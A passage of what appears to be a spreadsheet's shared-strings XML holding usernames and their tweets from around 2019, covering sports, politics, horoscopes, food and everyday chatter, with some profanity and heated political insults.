    <t>FEDUpRally</t>
  </si>
  <si>
    <t>The Opioid Litigation: Settlements, Winners, and Losers https://t.co/W6q6vbpsIT</t>
  </si>
  <si>
    <t>treivydagoat</t>
  </si>
  <si>
    <t>I really need to take a trip somewhere before I go back to work in August</t>
  </si>
  <si>
    <t>JulsGarn</t>
  </si>
  <si>
    <t>Sweet nothings ricochet through the air today. You can fall in... More for Virgo https://t.co/Unlw9Pt61O</t>
  </si>
  <si>
    <t>James__SCFC</t>
  </si>
  <si>
    <t>@h_phillips05 @FtblCB Never have been and will be in your shadow thanks. And when your club finishes in the top half of the Prem and gets Europa league football then pipe up</t>
  </si>
  <si>
    <t>DWard7777</t>
  </si>
  <si>
    <t>@CountDankulaTV I get that free speech is your main shtick but it's debatable that Trump is even good for that. His economic policies are ruinous (we are poised for another recession) and he has done nothing that he promised his voters. Like him or not but at least Bernie is consistent.</t>
  </si>
  <si>
    <t>boothylaura</t>
  </si>
  <si>
    <t>@stevetaylo @HaddockSue @SAMascarenhas72 @CoolCoolpete36 Looks like a lovely fish and colour 🐋</t>
  </si>
  <si>
    <t>PaulTobin</t>
  </si>
  <si>
    <t>@britbritboom When I was in college I had a REALLY small apartment, and had one chair built out of comic book boxes and blankets. Because I was CLASSY.</t>
  </si>
  <si>
    <t>GLITTERROAD</t>
  </si>
  <si>
    <t>@CharisLoveXO @BLKLiberation84 @KissmekateOK @DestinDiarra @kia_soto Always like Atlantic Starr and Bon Jovi combined. Yet you got others Negroes that would tell you dont employ whataboutthemism. Ofays are the architects of that and got a media to emphasize any whataboutthemism anytime they want.</t>
  </si>
  <si>
    <t>BLifeParker</t>
  </si>
  <si>
    <t>Where to Sip Boozy, Bubbly Spiked Seltzer All Summer Long https://t.co/qdX7SN1vWD</t>
  </si>
  <si>
    <t>Moshe_Hoffman</t>
  </si>
  <si>
    <t>@epicciuto Nor does it need to be logically valid. Just hard for others to spot the flaw, or not socially acceptable for me to point the flaw out (eg cause requires me to state a racist belief to disprove his argument.)</t>
  </si>
  <si>
    <t>MyGodRaf</t>
  </si>
  <si>
    <t>LMAOOOO this the most random shit https://t.co/Z5WqGju6Lu</t>
  </si>
  <si>
    <t>BcastGaming</t>
  </si>
  <si>
    <t>So this is a thing. Just screwing around and working on achievements. https://t.co/pCfpL8fbOs</t>
  </si>
  <si>
    <t>uspolicies</t>
  </si>
  <si>
    <t>#Trump Presses #WTO to Change #China's 'Developing Country' Status https://t.co/FKuaNkSeOi</t>
  </si>
  <si>
    <t>GNUTTyy</t>
  </si>
  <si>
    <t>You may feel as if you are bursting at the seams now. You woul... More for Leo https://t.co/10vH8pzlnz</t>
  </si>
  <si>
    <t>AyemSigns</t>
  </si>
  <si>
    <t>Homeless man behind me is on the floor all yaked out but he has a radio and it’s playing oldies.</t>
  </si>
  <si>
    <t>mjdominic1</t>
  </si>
  <si>
    <t>@katieeeeebell Melons for some reason lmaoooooooo</t>
  </si>
  <si>
    <t>DaystarJoni</t>
  </si>
  <si>
    <t>The value of persistent prayer is not that He will hear us, but that we finally hear Him.</t>
  </si>
  <si>
    <t>smokescreek</t>
  </si>
  <si>
    <t>@Nate_McMurray I thought he was doing an audition for assistant dictator . Who goes off on a rant like that for a job ? Might as well been in Trumps office thats the only audience he was playing to .</t>
  </si>
  <si>
    <t>mmmdonuts_</t>
  </si>
  <si>
    <t>I’m ready for the weekend already</t>
  </si>
  <si>
    <t>modelingcraze</t>
  </si>
  <si>
    <t>@condorsf What a little doll!! To cute for word's</t>
  </si>
  <si>
    <t>drew8117</t>
  </si>
  <si>
    <t>@nexanderthal_ I’m guessing you don’t know the difference in ceiling and floor. Dak hasn’t won less than 9 games so far.</t>
  </si>
  <si>
    <t>fairiefountain</t>
  </si>
  <si>
    <t>did anyone else watch captain n the game master? https://t.co/3a45DCYtB3</t>
  </si>
  <si>
    <t>_OnTheSUNNYSide</t>
  </si>
  <si>
    <t>I been craving cucumbers with salt pepper and vinegar and I finally got some today ☺️</t>
  </si>
  <si>
    <t>ItsDanyLeduc</t>
  </si>
  <si>
    <t>@finalmouse Time for canada now</t>
  </si>
  <si>
    <t>MarieKateland</t>
  </si>
  <si>
    <t>@slsandpet All of the above</t>
  </si>
  <si>
    <t>newmanfilms</t>
  </si>
  <si>
    <t>Dr. Pimple Popper Is Back With Dr. Lee for Explosive New Season https://t.co/WHGmAenvg7</t>
  </si>
  <si>
    <t>jobear90</t>
  </si>
  <si>
    <t>651 words for me today! I feel accomplished even with the small amount! Little goals! #amwriting #campnanowrimo</t>
  </si>
  <si>
    <t>bobby_bridge</t>
  </si>
  <si>
    <t>There's just no excuse for this https://t.co/63oa6puLJR</t>
  </si>
  <si>
    <t>haley_arter</t>
  </si>
  <si>
    <t>I haven’t had a white claw since moving to Idaho.... has ID changed me and I don’t even know it???? 🧐</t>
  </si>
  <si>
    <t>julietk</t>
  </si>
  <si>
    <t>@ZoeSumra I’ve been writing a lot of fic lately too &amp; yep it does definitely happen faster even when I’m working hard to get it right!</t>
  </si>
  <si>
    <t>giraffesnax</t>
  </si>
  <si>
    <t>until this morning on the train, I had completely forgotten about my DEEP obsession with the Barenaked Ladies when I was 9 years old</t>
  </si>
  <si>
    <t>favoritesch_tjp</t>
  </si>
  <si>
    <t>@MollyJongFast There are some Kentucky counties using hackable voting machines without any paper trail record. Mitch has opposed spending to update/replace them. Wonder how his vote totals look there? Fayette, the second largest county, uses wheel machines the county clerk says "stink".</t>
  </si>
  <si>
    <t>RoarkDork</t>
  </si>
  <si>
    <t>Trash goblin is still cute even when destroying my trash can for no discernable reason https://t.co/fObQHDzBQj</t>
  </si>
  <si>
    <t>OkayBlogJason</t>
  </si>
  <si>
    <t>@RichRollsDice @dnd_retweets I'd say only if someone else managed to attune in the meantime.</t>
  </si>
  <si>
    <t>PinChasers</t>
  </si>
  <si>
    <t>Start putting together your shortlist! Fall Bowling League signups start soon. Tag the people you want on your team! #Shortlist #FallBowlingLeague #FallBowlingLeagues #BuildYourTeam https://t.co/EyYd1IoMWo</t>
  </si>
  <si>
    <t>annagrvcia</t>
  </si>
  <si>
    <t>@liltraviesa702 the disrespect in this tweet bro 😭😭😭</t>
  </si>
  <si>
    <t>stuckbug</t>
  </si>
  <si>
    <t>@bethamari Enjoy the RPG time, and best of luck on whatever comes after!</t>
  </si>
  <si>
    <t>NextBestPicture</t>
  </si>
  <si>
    <t>Going to bed and dreaming about painted houses. See you all in the AM.</t>
  </si>
  <si>
    <t>daliaalvarez27</t>
  </si>
  <si>
    <t>@kraul_antonio @shelbynicole02 Oh my gosh hahahaha anything for my friends</t>
  </si>
  <si>
    <t>MoniNicholee</t>
  </si>
  <si>
    <t>I could listen to @6LACK all day. ✨</t>
  </si>
  <si>
    <t>slcochran</t>
  </si>
  <si>
    <t>Temp 76.1°F Hum 66﹪ Winds W 0.0 to 0.0mph Rain 0.00in Baro 29.54inHg https://t.co/oNKYvm9zKs</t>
  </si>
  <si>
    <t>Emmy_Zje</t>
  </si>
  <si>
    <t>@Pozzy22 @AmyJamiC Here’s one to report, y’all. Hey @AmyJamiC might wanna check to see if this puppet is following you.</t>
  </si>
  <si>
    <t>JohnSwa32957192</t>
  </si>
  <si>
    <t>@JackPosobiec @OANN @johncardillo Can we return your wife back to her country? I’ll buy the ticket!</t>
  </si>
  <si>
    <t>MAnnikaah</t>
  </si>
  <si>
    <t>It was just like being back in high school for him. The light headedness, tunnel... https://t.co/jmIfuB0ZFv</t>
  </si>
  <si>
    <t>omarpassons</t>
  </si>
  <si>
    <t>1/ Looking forward to @naehomelessness and some very helpful discussions to move forward our commitment to getting people into homes w/support in San Diego. #NAEH2019 - started on the flight out!</t>
  </si>
  <si>
    <t>LDWA1</t>
  </si>
  <si>
    <t>@MarchesLDWA He/she appears to lack feet, though, which may be something of a disadvantage - difficult even to balance on two footless leg-ends and a pole, never mind walking anywhere.</t>
  </si>
  <si>
    <t>ChrissyTreat</t>
  </si>
  <si>
    <t>Thinking about naming the chickens we are getting soon after @NPR reporters and let me tell you, this is a tough decision</t>
  </si>
  <si>
    <t>Stinnett_</t>
  </si>
  <si>
    <t>Illenium album in the streets, Illenium show in the sheets.</t>
  </si>
  <si>
    <t>1080Johnson</t>
  </si>
  <si>
    <t>@Jeanette630 @AOC @RepRaskin @RoKhanna @RepCummings Hey @AOC, why aren’t you gonna answer? You’re really good at spouting off and blowing your own horn but NEVER answer or respond to people who comment! You just want people to hear you and NOT care about what others think! True politician!</t>
  </si>
  <si>
    <t>YWCAStJoe</t>
  </si>
  <si>
    <t>So these bikers walked into #ywcasj the other day 😳😟😬...thank you Wicked Sisterz for your generous gift to our Victims Services department. #socialgood #giveback #bikergirl #motorcycle #bikerchick #bikerlife #womenwhoride #OnAMission https://t.co/9h0plxs66U</t>
  </si>
  <si>
    <t>jjustiice</t>
  </si>
  <si>
    <t>@JaytotheB_ If you bottom for anybody they need to worship an honor your hard work. Make it extremely hard for men to get the box. Period!</t>
  </si>
  <si>
    <t>tonyand35322483</t>
  </si>
  <si>
    <t>@TorontoStar @deAdder Really? After a year this is what we get yet the dumb asses who bankrupted our province and created the gong show skated through for decades ... just stop pretending to be journalists</t>
  </si>
  <si>
    <t>1010XLBalls</t>
  </si>
  <si>
    <t>@EdMoran1964 It’s a show that takes the moral high ground</t>
  </si>
  <si>
    <t>saint_vivi</t>
  </si>
  <si>
    <t>@ilovesmick Zebra cakes and pecans</t>
  </si>
  <si>
    <t>MrRktman</t>
  </si>
  <si>
    <t>@BurdsIVue Evidently, all the good ones are either taken, or are Steelers fans...</t>
  </si>
  <si>
    <t>isocarmelonie</t>
  </si>
  <si>
    <t>“Did I actually come up with this thought or did my subconscious dig up a tweet I saw 3 weeks ago”</t>
  </si>
  <si>
    <t>babegee1</t>
  </si>
  <si>
    <t>You quest for synergy between your work and your values. Being... More for Pisces https://t.co/oRa9PRK0xa</t>
  </si>
  <si>
    <t>PaulRevolution2</t>
  </si>
  <si>
    <t>@sphenefan @KevinPascoe @BBCNewsnight Newsnight has never been the same since they tried to hide Jimmy Savile after his death. Never talk about 114 lost files child abuse enquiry files. Men with power and money victims with no power and money.</t>
  </si>
  <si>
    <t>BackToMyOldSelf</t>
  </si>
  <si>
    <t>@MagicallyGlazed @KaisNaughtyGirl + the other one when you escaped and came home. We didn't know who she was but she was dressed like it was the 1800's or something so we figured we should show it to Damon. He saw it and told us it was his mother. Long story short, Caroline's mother died, she turned her humanity+</t>
  </si>
  <si>
    <t>jamesjackfruit</t>
  </si>
  <si>
    <t>Me: I want to draw my own models in ways that mean something to me. Art school: no. here’s a model this is there pose. Draw it. Art school: please write about the meaning and choice behind why you chose to draw this model and in this pose https://t.co/zyx2hGFEte</t>
  </si>
  <si>
    <t>TouchJustice</t>
  </si>
  <si>
    <t>@anjellykat From the words of this beast “You’re not dieting for the taste mf, you’re dieting for the results dieting will get you” https://t.co/Fpymzu3t5x</t>
  </si>
  <si>
    <t>incuriouskills</t>
  </si>
  <si>
    <t>@TheDemCoalition @MichellesDude 1) But therein lies another absurdity of Democrats -- they had the chance to have them already and didn't take 'em. And instead of demanding to get whatever fed taxes they have a right to (they compromise for 6 years or whatever). Par for the course when it comes to the DP.</t>
  </si>
  <si>
    <t>CRG_CRM</t>
  </si>
  <si>
    <t>In the Wake of Fukushima. Imagining Disasters in the Era of Climate Change: Is Japan’s Seawall a New Maginot Line? https://t.co/TXGA5MUO6U #fukushima #japan https://t.co/CHUnDvxXKn</t>
  </si>
  <si>
    <t>MsJannehh</t>
  </si>
  <si>
    <t>@_naninaaaa Damn boo I’m just now seeing this ... imma pull up on you on Friday 😘</t>
  </si>
  <si>
    <t>MLFoxwell</t>
  </si>
  <si>
    <t>@Hamada_520 @NintenZ I think they could justify it, as so many of Ken's normals are unique, and Chrom got a unique special. So it's not unprecedented.</t>
  </si>
  <si>
    <t>HawthornGallery</t>
  </si>
  <si>
    <t>Olivia in the White Room by Gwyn Jones, £1,195 https://t.co/48H02iQoEj #ArtLovers #Cheshire https://t.co/Qgfe2jTt6t</t>
  </si>
  <si>
    <t>sam_w_ob</t>
  </si>
  <si>
    <t>Meet the New Drone Machine Learning That's Changing Riot Control and Medical Emergencies... https://t.co/H69zMQTund https://t.co/qxu3z9x36M</t>
  </si>
  <si>
    <t>TooMuchContent</t>
  </si>
  <si>
    <t>@tomfgoodwin Looking forward to some really excellent expressions of these (w/ a whole lot of crap).</t>
  </si>
  <si>
    <t>OIBaseball1</t>
  </si>
  <si>
    <t>Oi u15 beats Midwest Prospects u16 5-0. Complete game shutout for AJ Stace. Hits by Connor Well, Joey Shapiro, and Kyle Jennings GO OI!⚾️</t>
  </si>
  <si>
    <t>djfanboy</t>
  </si>
  <si>
    <t>The only outlandish thing is do with money is build a motorcycle modeled after the bike from #AKIRA</t>
  </si>
  <si>
    <t>ToshFan44</t>
  </si>
  <si>
    <t>@RichLew82 @oldwindsorblue @bbc5live @5liveSport You have not attempted to substantiate how/why Toshack was to blame for each. I accept that he did not fancy Savage and I agree it was necessary in view of the transition he needed to take. Please explain the others.</t>
  </si>
  <si>
    <t>shashj</t>
  </si>
  <si>
    <t>@adam_tooze I'd never seen a cubesat until last month. They're tiny, barely larger than a Rubik's cube. Tracking them, especially beyond LEO, is going to be incredibly challenging.</t>
  </si>
  <si>
    <t>taymakeusadrink</t>
  </si>
  <si>
    <t>When Beto said “we are Americans first,” i mean, I’m personally a Swiftie first and an American second but ok</t>
  </si>
  <si>
    <t>KeepUpWithKels_</t>
  </si>
  <si>
    <t>@jaylachante_ I’m about to delete this tweet. 😑 I was talking about the donut shop. Lmao</t>
  </si>
  <si>
    <t>kenizzlmynizzl</t>
  </si>
  <si>
    <t>Shout out to @johnrockyafella. That’s all.</t>
  </si>
  <si>
    <t>DragoonART</t>
  </si>
  <si>
    <t>Why is everyone making a big fuss that the new Overwatch character isn't wearing shoes?</t>
  </si>
  <si>
    <t>taykinsella</t>
  </si>
  <si>
    <t>There are two flies fucking on my plant and I’m not okay with it</t>
  </si>
  <si>
    <t>MillieLHindle</t>
  </si>
  <si>
    <t>@matt_scrafton It’s so exciting to see so much activity from the club 😍😍🧡</t>
  </si>
  <si>
    <t>zxxyg</t>
  </si>
  <si>
    <t>Yeah idk how I’m just now hearing it but blame it on your love is such a fucking banger and I am living for it</t>
  </si>
  <si>
    <t>ctbloggerbabes</t>
  </si>
  <si>
    <t>#Repost @Lisa_Bartone #bohemianfestivalct ・・・ Give me all of the bohemian festival vibes 🌸 Had so much fun at the @ctbloggerbabes event yesterday! Met so many amazing bloggers, made this adorable flower crown (the… https://t.co/knpveqpzVW</t>
  </si>
  <si>
    <t>kristi_idol</t>
  </si>
  <si>
    <t>Click &lt;a href="https://t.co/9dJsdpOAXP" style="color: #0967ad; text-decoration: none;" &gt;here&lt;/a&gt; for a VisualTour</t>
  </si>
  <si>
    <t>WDBTHtGP</t>
  </si>
  <si>
    <t>@BONK_MK I like this the most personally but it feels too cool for me. Ideally I'd have something lamer but still recognizable. Good work by Branding Manager BONK™ It's also just two words so would be hard to search... maybe with a suffix or something though??</t>
  </si>
  <si>
    <t>victoria91x</t>
  </si>
  <si>
    <t>Shopping tomorrow for all healthy food The scales have upset me tonight 😭</t>
  </si>
  <si>
    <t>thickysmiley</t>
  </si>
  <si>
    <t>@cocoashaibin You’ve seen Dead to Me haven’t you?</t>
  </si>
  <si>
    <t>ElemScott</t>
  </si>
  <si>
    <t>@THATGyalJasmine Fam, It's just so gross to me!</t>
  </si>
  <si>
    <t>ghostmodePDX</t>
  </si>
  <si>
    <t>@rhymeswithtina 🙏🙏 thank youuu All that space to cut loose.</t>
  </si>
  <si>
    <t>GinaPsallidas</t>
  </si>
  <si>
    <t>@sikenye And so it begins...</t>
  </si>
  <si>
    <t>Ukuooo</t>
  </si>
  <si>
    <t>@Akirafan99 It just means there's a lot of room for improvement. Keep at it.</t>
  </si>
  <si>
    <t>luivuitton_</t>
  </si>
  <si>
    <t>Need these size 9.5 in LA @RetailTuesday @emotley18 for the pic https://t.co/2mWk5Wo3Se</t>
  </si>
  <si>
    <t>xScaryTerry</t>
  </si>
  <si>
    <t>@tdawg10573 @PrimeRedskins No they don’t 😂 the giants literally got worse</t>
  </si>
  <si>
    <t>GiveMeSport</t>
  </si>
  <si>
    <t>This journalist got absolutely done by the 'porn sound prank' at a press conference 😂 https://t.co/Mpy6Imsflt</t>
  </si>
  <si>
    <t>PennsylvaniaGov</t>
  </si>
  <si>
    <t>Happy #WorldRangerDay, PA! Thank you to our @DCNRnews rangers, who both educate and keep visitors safe throughout 2.4 million acres of Pennsylvania's park and forest lands. 🏞 https://t.co/hX12RpF3U8</t>
  </si>
  <si>
    <t>grrtt_wrich</t>
  </si>
  <si>
    <t>Tell me I’m the only star shining in the sky 💫</t>
  </si>
  <si>
    <t>krimar</t>
  </si>
  <si>
    <t>@EmmylieBorg @MaiselTV A few months ago my wife and I ploughed through the two seasons. My wife is convinced that I want to run away with @RachelBros and @AlexBorstein. She could be right 😏.</t>
  </si>
  <si>
    <t>ahendo17</t>
  </si>
  <si>
    <t>@RaunchyIs Thong - can spice it up getting access 😜</t>
  </si>
  <si>
    <t>JagexAsh</t>
  </si>
  <si>
    <t>@Ari_Fans_2016 Not that I know of. It might just be that there were so many updated NPCs and scenery pieces that it gave that impression. Object IDs can't actually change, internally.</t>
  </si>
  <si>
    <t>FreeOpportunist</t>
  </si>
  <si>
    <t>@Chris_Paulette @ge_kaitlyn @GodlessEngineer Hes been in the public eye forever. Just because youre in a pic with someone doesnt mean you know all about them, even if he was friends with him at one point. Id hate to be judged on people Ive hung out with in the past! One of them went to syria to join ISIS ffs!</t>
  </si>
  <si>
    <t>REDV6</t>
  </si>
  <si>
    <t>@RonnyLerner 😂😂😂 so what you are saying Essendon are brave when they win by 10 points getting 18-5 penalty count in the second half 29-14 over all and that’s just a gutsy win please!!! So the gift of giving to the bombers is ok but not vice versa #Saltymuch</t>
  </si>
  <si>
    <t>TammyKreif</t>
  </si>
  <si>
    <t>The Hidden Story of the Trump Family Rabbi https://t.co/HONMgsS6q0 via @BCNbcn</t>
  </si>
  <si>
    <t>barbfriedberg</t>
  </si>
  <si>
    <t>The Impact of Financial Lock-In https://t.co/NjnrY39UCY .@trenttsd https://t.co/cXwDfNwyAU</t>
  </si>
  <si>
    <t>Nadiafo68846427</t>
  </si>
  <si>
    <t>@charliemoores Happy Birthday to you Charlie.💜😘🥂🎂</t>
  </si>
  <si>
    <t>ayah_ea</t>
  </si>
  <si>
    <t>“How much better would it be if we stopped making declarations for a while and humbly, earnestly, tried to listen to God?" -Ingrid Mattson</t>
  </si>
  <si>
    <t>shanesween</t>
  </si>
  <si>
    <t>It smells like hot dogs too early today in the city</t>
  </si>
  <si>
    <t>kayrea95</t>
  </si>
  <si>
    <t>I wish the Irish knew how to tip like they know how to drink 🥴</t>
  </si>
  <si>
    <t>adriandentreal</t>
  </si>
  <si>
    <t>The season finale Check it out https://t.co/XDp076QDyD</t>
  </si>
  <si>
    <t>Matt031184</t>
  </si>
  <si>
    <t>@WiganWarrLotto Ive got to nominate my brother @philtom84 becuase he gives so much back with his work and he as always been passionate about the cherry and red</t>
  </si>
  <si>
    <t>LUpthegrove</t>
  </si>
  <si>
    <t>@RandPaul Mueller said he couldn’t indict a sitting President because Barr thinks a President is above the law. BUT AFTER he is President Mueller mentioned the word conspiracy. That would be conspiracy to defraud the United States of America 🇺🇸</t>
  </si>
  <si>
    <t>alinaannt</t>
  </si>
  <si>
    <t>@samfranklin667 @BBCWorld I’d also like to add this excerpt from a NYT article about the proposal. It could be making college or housing more equitable, not necessarily a straight up cash payout. https://t.co/tKDqTccKRp</t>
  </si>
  <si>
    <t>pinkrocktopus</t>
  </si>
  <si>
    <t>@StrangeAttract5 A fellow Florida girl, too! (She and I both got out, of course.)</t>
  </si>
  <si>
    <t>Taylor96973369</t>
  </si>
  <si>
    <t>@Popsicle Can u bring back the banana one pls</t>
  </si>
  <si>
    <t>egino</t>
  </si>
  <si>
    <t>One of the biggest mistakes leaders make when building AI-powered organization is to view AI as a plug-and-play technology with immediate returns.</t>
  </si>
  <si>
    <t>threadreaderapp</t>
  </si>
  <si>
    <t>@kikisquared Hola the unroll you asked for: Thread by @videolan: "About the "security issue" on : VLC is not vulnerable. tl;dr: the issue is in a 3rd party library, called libebml, […]" #VLC https://t.co/6g2p40GCub Enjoy :) 🤖</t>
  </si>
  <si>
    <t>p1nkybrain</t>
  </si>
  <si>
    <t>@katebarstool Dimple piercings would be the piercing that would take you from 🔥🔥🔥 to 🔥🔥🔥🔥👌</t>
  </si>
  <si>
    <t>MplsMe</t>
  </si>
  <si>
    <t>"Chinese fugitive who belongs to President Trump’s Mar-a-Lago club is accused of being a spy, according to documents filed in a federal court case. Because, of course." - Scott Dworkin https://t.co/VYhL2ZGy0C</t>
  </si>
  <si>
    <t>ameratron</t>
  </si>
  <si>
    <t>VA drivers be the only drivers that can make a whole traffic jam outta only 5 cars in a 4 lane road</t>
  </si>
  <si>
    <t>steveco87037733</t>
  </si>
  <si>
    <t>@Jonosufc1996 @Jack_2260 @Harrysampson8 @debkalpa96 Ok,gave up on Maupay then? I know Cadette said the deal was dead. McBurnie might be a better fit to be fair. Watched a few highlights on their pre season and he can pick a pass out. Seem to have a good all round game</t>
  </si>
  <si>
    <t>ricksaban_</t>
  </si>
  <si>
    <t>You always have to celebrate your people in the moment. My partna @MrSirCOOL went in on this Reebok campaign! Forever proud mane and stay savage! #KillaSZNSTILL #DirtySouthMadMen https://t.co/tgkvmxlL6X</t>
  </si>
  <si>
    <t>maxmode15</t>
  </si>
  <si>
    <t>Aight let me listen to this burna ish.</t>
  </si>
  <si>
    <t>HilarySmith8</t>
  </si>
  <si>
    <t>Health warning as heatwave due to sweep the UK https://t.co/Wdo5dxxHH5</t>
  </si>
  <si>
    <t>localbarmedia</t>
  </si>
  <si>
    <t>I want to thank you all for the political theater for the past few months. But the fellas have now reported to training camp, so I'll see ya later!</t>
  </si>
  <si>
    <t>judgemania99</t>
  </si>
  <si>
    <t>A Laser single for Hicks!!!! 7-3 Yanks!!!! #PinstripePride https://t.co/UGUDYCiiXj</t>
  </si>
  <si>
    <t>MickeyZhivago</t>
  </si>
  <si>
    <t>@cenkuygur @JudgeJeanine Once Strzok was exposed, Mueller's rabid scumbags were forced to admit No collusion. They covered their own ass in the process. Stop denying the obvious: it was a failed coup</t>
  </si>
  <si>
    <t>todd_venning</t>
  </si>
  <si>
    <t>@sheep_data_mgmt @chriswalsh008 In country where wool likes going all colours of the rainbow in August, there isn't a lot of choices in genetics if you don't like bales and bales of colour, wool rot and dermo. Becomes difficult to get shearers, family has been there done that before....</t>
  </si>
  <si>
    <t>Oregongrandma</t>
  </si>
  <si>
    <t>@BrainyHunny I’m so sorry. I lost my mom to CHF also. It’s a tough way to go.</t>
  </si>
  <si>
    <t>revlakas</t>
  </si>
  <si>
    <t>don’t want to do this https://t.co/bmklaxGBRZ</t>
  </si>
  <si>
    <t>tranceaddict66</t>
  </si>
  <si>
    <t>@xXxconquerorxXx @RhaegarRemDeiku @greg_doucette @NickRekieta Do you not get we're talking about the case (mostly)? The CASE is bupkis. Any commentary about Vic being a sex pest is informed be the information READILY AVAILABLE.</t>
  </si>
  <si>
    <t>Nitomatta</t>
  </si>
  <si>
    <t>The Outer Worlds on Switch was the very last thing I expected but now I can tell Epic Games to fuck off even more.</t>
  </si>
  <si>
    <t>mikeymeitbual</t>
  </si>
  <si>
    <t>@NYCPBA Ya'll do remember that you're public servants, right? You chose to serve your community, but you do so with the blessing of the community. Remember the good ol' days when police were peace officers instead of power-hungry pigs?</t>
  </si>
  <si>
    <t>GreenWingBird</t>
  </si>
  <si>
    <t>@TheRevAl Al Sharpton preaches to kill cops and white people on stage but the democrats embrace him and his ideology. Do any of the democrats have any balls to say "Beat it" to this racist, hate filled idiot? No, they don't because they all fear blacks!!!! Go to hell, Al Sharpton!</t>
  </si>
  <si>
    <t>themaradiaries</t>
  </si>
  <si>
    <t>Someone hacked my fucking Apple account now they have my card, my nudes and my playlist https://t.co/YISc5hU1Dk</t>
  </si>
  <si>
    <t>Pfleghaar</t>
  </si>
  <si>
    <t>"Thurston" 2014, mixed media on paper, 30 x 22 Abstract painting inspired from a series of mid-century modern lamps, this one named for the designer Gerald Thurston. Colors reminiscent of industrial and interior design of the 1960s. https://t.co/4GvwmcGzd0 https://t.co/4MINNzb1wd</t>
  </si>
  <si>
    <t>DanTambling</t>
  </si>
  <si>
    <t>Hey Michael Hammer(@AnarchyOutlaw), thank you for following me</t>
  </si>
  <si>
    <t>brianday52</t>
  </si>
  <si>
    <t>@Carrie_Vandetta I've just been informed there's a company in Suffolk....Stokes is the name, I've been trying to find a stockist near me. I believe Waitrose stock it. Tiptree is another English brand of sauce, based in Essex 👍👏👏🇬🇧😉 Hope that helps 😎</t>
  </si>
  <si>
    <t>tomseyms</t>
  </si>
  <si>
    <t>Why I think @talkSPORTDrive is wrong about Sheffield United and Billy Sharp. I'll say it here now - not only will the Blades stay up but they'll perform the best out of the 3 promoted clubs. #sufc #twitterblades https://t.co/deKNcEFFIs</t>
  </si>
  <si>
    <t>thotvacado</t>
  </si>
  <si>
    <t>I didn’t have tweezers on me at the gas station this morning so I had to call my coworker to come help me get my card out of the stupid card reader lmao having long nails is rlly hard sometimes 😞</t>
  </si>
  <si>
    <t>AngelaTravel53</t>
  </si>
  <si>
    <t>New #review: "This tour was exactly what we wanted. The holiday was in the centre of all the towns etc. Paington..." https://t.co/9HkN08nk1b</t>
  </si>
  <si>
    <t>TannerBolt</t>
  </si>
  <si>
    <t>Buying Made Easy with Related Items, Corrosion Resistant Stainless for Bi-Metal Fastening &amp; Critical Fastening Product Highlights - https://t.co/Olz5BSVoBX https://t.co/ZBNXpOsNmY</t>
  </si>
  <si>
    <t>kjpatton67</t>
  </si>
  <si>
    <t>@HendersonFlash @FDuelers @DCBombers .@Derek_Wagner22 led the 15-hit performance as he went 3-for-3 with 2 doubles and 4 RBIs. @Joshj515 was 3-for-5 with a double &amp; @TheRealNoah02 was 3-for-4 with a double.</t>
  </si>
  <si>
    <t>DragonFIFA_</t>
  </si>
  <si>
    <t>@bateson87 Is this Madden any good? Much difference from the last one?</t>
  </si>
  <si>
    <t>MARTASERVICE</t>
  </si>
  <si>
    <t>Due to a previous mechanical issue, delays occurring on the WB (Blue) line services.</t>
  </si>
  <si>
    <t>Petey_FC</t>
  </si>
  <si>
    <t>@pretypenguin @TimbersFC I worked with and am friends with some translators, and they take their craft of translating without editorializing very seriously. I think only one of them interprets, though, as most of those jobs are depressing hospital jobs.</t>
  </si>
  <si>
    <t>PhilipWatling</t>
  </si>
  <si>
    <t>@FX_Digital Hit by car. Died! Wrote #FlightOfALifetime: an inspiring (e)book about #life #death #resurrection #horses written to bring hope where there is only despair</t>
  </si>
  <si>
    <t>x_arianaaa</t>
  </si>
  <si>
    <t>Appearances can be deceiving, so take time to weigh how you co... More for Aries https://t.co/BiBGrTB4oi</t>
  </si>
  <si>
    <t>kitchenpractic1</t>
  </si>
  <si>
    <t>Got a new commercial crepe maker, completely botched the seasoning! Any suggestions? : AskCulinary https://t.co/D0eoBtbPnh</t>
  </si>
  <si>
    <t>AdamHolloway_</t>
  </si>
  <si>
    <t>Zaha played up cos he dreams of playing for Arsenal, we get Pepe and now he will have to go to Everton, the poor bastard 😂😂</t>
  </si>
  <si>
    <t>farmercal8950</t>
  </si>
  <si>
    <t>@sairasameerarao You may be the only actual nazi on twitter.</t>
  </si>
  <si>
    <t>BreezyHillMktg</t>
  </si>
  <si>
    <t>Check out our marketing budget template to help you create a detailed plan that will help deliver results. Need help on how to implement a marketing budget or plan? Contact us today! #marketing #digitalmarketing https://t.co/8mt9SDoreq</t>
  </si>
  <si>
    <t>EARRRLLLYYYY</t>
  </si>
  <si>
    <t>My fat ass skipping the Gym for the 3rd day in a row 👎🏾 https://t.co/UxQ3qxtRnR</t>
  </si>
  <si>
    <t>KorinnaMei</t>
  </si>
  <si>
    <t>@jenn_woodall We could conquer the world!!!!</t>
  </si>
  <si>
    <t>RickSherwood9</t>
  </si>
  <si>
    <t>@BetteMidler Your correct about not giving s flying fuck, but it’s you not our president that we don’t care about. He’s working to make America great. And just what is it that you’re doing. Creep!</t>
  </si>
  <si>
    <t>curious_truckel</t>
  </si>
  <si>
    <t>Happy birthday to my bestest bud @LRadoje 🖤 https://t.co/yyaMl7TYxt</t>
  </si>
  <si>
    <t>dark_morn</t>
  </si>
  <si>
    <t>@charliekirk11 Mark says - if we deport all fascists, and their followers, such as yourself, America would be a much stronger country. Fascists - let's blame brown people and women for everything. #Sanders2020 #ISTANDWITHILHAN #trump4prison #THESQUAD</t>
  </si>
  <si>
    <t>notadjustabill</t>
  </si>
  <si>
    <t>@wadubato After the Monday I had, it should be Friday!</t>
  </si>
  <si>
    <t>joffe_maurice</t>
  </si>
  <si>
    <t>@JasonSCampbell Lock the scumbag up in a cage with no shower , bed , blanket , water , toothpaste and throw the key away. Let the moron rot away @JasonSCampbell</t>
  </si>
  <si>
    <t>pennsurgery</t>
  </si>
  <si>
    <t>#ICYMI… Last night we celebrated the promotions of @tchou_julia (Professor of Clinical Surgery) and Robert Roses, MD (Associate Professor of Surgery). Congratulations to you both and Thank You for all that you do!! https://t.co/kFnF35qCj7</t>
  </si>
  <si>
    <t>SmashKidsTV</t>
  </si>
  <si>
    <t>Look at all these #dragonball statues, #frieza and #majinbuu are giving me the creeps 😖 don't they just look awesome? . . . #db_tour2019 #dragonball #dragonballz #dragonballsuper #dragonballs @dragonballsuper #sdcc #sdcc2019 #comiccon #supersaiyan #k… https://t.co/hHNK7ifpHZ https://t.co/DJOLMaKGG7</t>
  </si>
  <si>
